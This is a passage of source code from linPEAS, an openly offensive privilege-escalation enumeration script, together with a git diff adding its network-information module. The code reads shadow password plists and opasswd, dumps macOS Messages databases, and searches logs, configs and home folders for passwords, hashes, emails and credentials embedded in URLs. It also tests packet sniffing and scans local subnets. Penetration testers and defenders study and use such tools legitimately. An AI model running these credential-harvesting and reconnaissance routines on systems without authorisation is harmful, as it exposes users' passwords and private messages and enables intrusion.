(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no
print_list "Can I write shadow plists? ........... "
possible_check=""
(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no
##-- IF) Read opasswd file
print_list "Can I read opasswd file? ............. "
if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo ""
else echo_no
fi
##-- IF) network-scripts
print_list "Can I write in network-scripts? ...... "
if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW},"
elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"
else echo_no
fi
##-- IF) Read root dir
print_list "Can I read root folder? .............. "
(ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no
echo ""
##-- IF) Root files in home dirs
print_2title "Searching root files in home dirs (limit 30)"
(find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found
echo ""
##-- IF) Others files in my dirs
if ! [ "$IAMROOT" ]; then
print_2title "Searching folders owned by me containing others files on it (limit 100)"
(find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g"
echo ""
fi
##-- IF) Readable files belonging to root and not world readable
if ! [ "$IAMROOT" ]; then
print_2title "Readable files belonging to root and readable by me but not world readable"
(find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found
echo ""
fi
##-- IF) Modified interesting files into specific folders in the last 5mins
print_2title "Modified interesting files in the last 5mins (limit 100)"
find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED},"
echo ""
##-- IF) Writable log files
print_2title "Writable log files (logrotten) (limit 100)"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation"
logrotate --version 2>/dev/null || echo_not_found "logrotate"
lastWlogFolder="ImPOsSiBleeElastWlogFolder"
logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100)
printf "%s\n" "$logfind" | while read log; do
if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found
if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC;
elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case
elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log";
elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g";
fi
fi
done
echo ""
##-- IF) Files inside my home
print_2title "Files inside $HOME (limit 20)"
(ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found
echo ""
##-- IF) Files inside /home
print_2title "Files inside others home (limit 20)"
(find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found
echo ""
##-- IF) Mail applications
print_2title "Searching installed mail applications"
ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps"
echo ""
##-- IF) Mails
print_2title "Mails (limit 50)"
(find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found
echo ""
##-- IF) Backup folders
print_2title "Backup folders"
printf "%s\n" "$backup_folders" | while read b ; do
ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g";
ls -l "$b" 2>/dev/null && echo ""
done
echo ""
##-- IF) Backup files
print_2title "Backup files (limited 100)"
backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null)
printf "%s\n" "$backs" | head -n 100 | while read b ; do
if [ -r "$b" ]; then
ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g";
fi;
done
echo ""
##-- IF) DB files
if [ "$MACPEAS" ]; then
print_2title "Reading messages database"
sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null
sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null
sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null
fi
print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)"
FILECMD="$(command -v file 2>/dev/null)"
if [ "$PSTORAGE_DATABASE" ]; then
printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do
if [ "$FILECMD" ]; then
echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g";
else
echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g";
fi
done
SQLITEPYTHON=""
echo ""
printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do
if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd
printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC
if [ "$(command -v sqlite3 2>/dev/null)" ]; then
tables=$(sqlite3 $f ".tables" 2>/dev/null)
#printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g"
elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then
SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null)
tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null)
#printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g"
else
tables=""
fi
if [ "$tables" ]; then
printf "%s\n" "$tables" | while read t; do
columns=""
# Search for credentials inside the table using sqlite3
if [ -z "$SQLITEPYTHON" ]; then
columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE")
# Search for credentials inside the table using python
else
columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null)
fi
#Check found columns for interesting fields
INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt")
if [ "$INTCOLUMN" ]; then
printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g"
printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g"
(sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head
fi
done
echo ""
fi
fi
done
fi
echo ""
if [ "$MACPEAS" ]; then
print_2title "Downloaded Files"
sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|"
fi
##-- IF) Web files
print_2title "Web files?(output limit)"
ls -alhR /var/www/ 2>/dev/null | head
ls -alhR /srv/www/htdocs/ 2>/dev/null | head
ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head
ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head
echo ""
##-- IF) All hidden files
print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)"
find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70
echo ""
##-- IF) Readable files in /tmp, /var/tmp, bachups
print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)"
filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70)
printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done
echo ""
##-- IF) Interesting writable files by ownership or all
if ! [ "$IAMROOT" ]; then
print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files"
#In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all
obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500)
printf "%s\n" "$obmowbe" | while read entry; do
if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC;
elif echo "$entry" | grep -qE "$writeVB"; then
echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW},"
else
echo "$entry" | sed -${E} "s,$writeB,${SED_RED},"
fi
done
echo ""
fi
##-- IF) Interesting writable files by group
if ! [ "$IAMROOT" ]; then
print_2title "Interesting GROUP writable files (not in Home) (max 500)"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files"
for g in $(groups); do
printf " Group $GREEN$g:\n$NC";
iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500)
printf "%s\n" "$iwfbg" | while read entry; do
if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC;
elif echo "$entry" | grep -Eq "$writeVB"; then
echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW},"
else
echo "$entry" | sed -${E} "s,$writeB,${SED_RED},"
fi
done
done
echo ""
fi
##-- IF) Passwords in config PHP files
print_2title "Searching passwords in config PHP files"
printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done
echo ""
##-- IF) TTY passwords
print_2title "Checking for TTY (sudo/su) passwords in audit logs"
aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g"
find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g"
echo ""
##-- IF) IPs inside logs
print_2title "Finding IPs inside logs (limit 70)"
(find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70
echo ""
##-- IF) Passwords inside logs
print_2title "Finding passwords inside logs (limit 70)"
(find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED},"
echo ""
##-- IF) Emails inside logs
print_2title "Finding emails inside logs (limit 70)"
(find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g"
echo ""
##-- IF) Passwords files in home
print_2title "Finding *password* or *credential* files in home (limit 70)"
(printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found
echo ""
if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then
##-- IF) Find possible files with passwords
print_2title "Finding passwords inside key folders (limit 70) - only PHP files"
intpwdfiles=$(timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$HOMESEARCH" /var/www /usr/local/www/ "$backup_folders_row" /tmp /etc /root /mnt /Users /private 2>/dev/null)
printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g"
echo ""
print_2title "Finding passwords inside key folders (limit 70) - no PHP files"
printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g"
echo ""
##-- IF) Find possible files with passwords
print_2title "Finding possible password variables inside key folders (limit 140)"
timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g"
timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g"
echo ""
##-- IF) Find possible conf files with passwords
print_2title "Finding possible password in config files"
ppicf=$(find "$HOMESEARCH" /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null)
printf "%s\n" "$ppicf" | while read f; do
if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then
echo "$ITALIC $f$NC"
grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g"
fi
done
echo ""
##-- IF) Find possible files with usernames
print_2title "Finding 'username' string inside key folders (limit 70)"
timeout 150 grep -RiIE "username.*[=:].+" "$HOMESEARCH" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g"
timeout 150 grep -RiIE "username.*[=:].+" /var/www "$backup_folders_row" /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g"
echo ""
##-- IF) Specific hashes inside files
print_2title "Searching specific hashes inside files - less false positives (limit 70)"
regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*'
regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}'
regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}'
regexwp='\$P\$[a-zA-Z0-9_/\.]{31}'
regexdrupal='\$S\$[a-zA-Z0-9_/\.]{52}'
regexlinuxmd5='\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}'
regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}'
regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}'
regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}'
timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED},"
echo ""
fi
if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then
##-- IF) Specific hashes inside files
print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)"
regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)'
regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)'
regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)'
regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)'
timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m,"
echo ""
fi
if ! [ "$SUPERFAST" ] && ! [ "$FAST" ]; then
##-- IF) Find URIs with user:password@hoststrings
print_2title "Finding URIs with user:password@host inside key folders"
timeout 150 find /var/www "$backup_folders_row" /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
timeout 150 grep -RiIE "://(.+):(.+)@" "$HOMESEARCH" 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
echo ""
fi

2317
linPEAS/builder/linpeas_base.sh → linPEAS/builder/linpeas_parts/linpeas_base.sh
View File

File diff suppressed because it is too large Load Diff

176
linPEAS/builder/linpeas_parts/network_information.sh Normal file
View File

@ -0,0 +1,176 @@
###########################################
#---------) Network Information (---------#
###########################################
if [ "$MACOS" ]; then
print_2title "Network Capabilities"
warn_exec system_profiler SPNetworkDataType
echo ""
fi
#-- NI) Hostname, hosts and DNS
print_2title "Hostname, hosts and DNS"
cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null
warn_exec dnsdomainname 2>/dev/null
echo ""
#-- NI) /etc/inetd.conf
print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf"
(cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf"
echo ""
#-- NI) Interfaces
print_2title "Interfaces"
cat /etc/networks 2>/dev/null
(ifconfig || ip a) 2>/dev/null
echo ""
#-- NI) Neighbours
print_2title "Networks and neighbours"
if [ "$MACOS" ]; then
netstat -rn 2>/dev/null
else
(route || ip n || cat /proc/net/route) 2>/dev/null
fi
(arp -e || arp -a || cat /proc/net/arp) 2>/dev/null
echo ""
if [ "$MACPEAS" ]; then
print_2title "Firewall status"
warn_exec system_profiler SPFirewallDataType
fi
#-- NI) Iptables
print_2title "Iptables rules"
(timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules"
echo ""
#-- NI) Ports
print_2title "Active Ports"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports"
( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED},"
echo ""
#-- NI) MacOS hardware ports
if [ "$MACPEAS" ]; then
print_2title "Hardware Ports"
networksetup -listallhardwareports
echo ""
print_2title "VLANs"
networksetup -listVLANs
echo ""
print_2title "Wifi Info"
networksetup -getinfo Wi-Fi
echo ""
print_2title "Check Enabled Proxies"
scutil --proxy
echo ""
print_2title "Wifi Proxy URL"
networksetup -getautoproxyurl Wi-Fi
echo ""
print_2title "Wifi Web Proxy"
networksetup -getwebproxy Wi-Fi
echo ""
print_2title "Wifi FTP Proxy"
networksetup -getftpproxy Wi-Fi
echo ""
fi
#-- NI) tcpdump
print_2title "Can I sniff with tcpdump?"
timeout 1 tcpdump >/dev/null 2>&1
if [ $? -eq 124 ]; then #If 124, then timed out == It worked
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing"
echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED},"
else echo_no
fi
echo ""
#-- NI) Internet access
if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then
print_2title "Internet Access?"
check_tcp_80 2>/dev/null &
check_tcp_443 2>/dev/null &
check_icmp 2>/dev/null &
check_dns 2>/dev/null &
wait
echo ""
fi
if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then
if ! [ "$FOUND_NC" ]; then
printf $RED"[-] $SCAN_BAN_BAD\n$NC"
echo "The network is not going to be scanned..."
else
print_2title "Scanning local networks (using /24)"
if ! [ "$PING" ] && ![ "$FPING" ]; then
printf $RED"[-] $DISCOVER_BAN_BAD\n$NC"
fi
select_nc
local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.")
printf "%s\n" "$local_ips" | while read local_ip; do
if ! [ -z "$local_ip" ]; then
print_3title "Discovering hosts in $local_ip/24"
if [ "$PING" ] || [ "$FPING" ]; then
discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp
fi
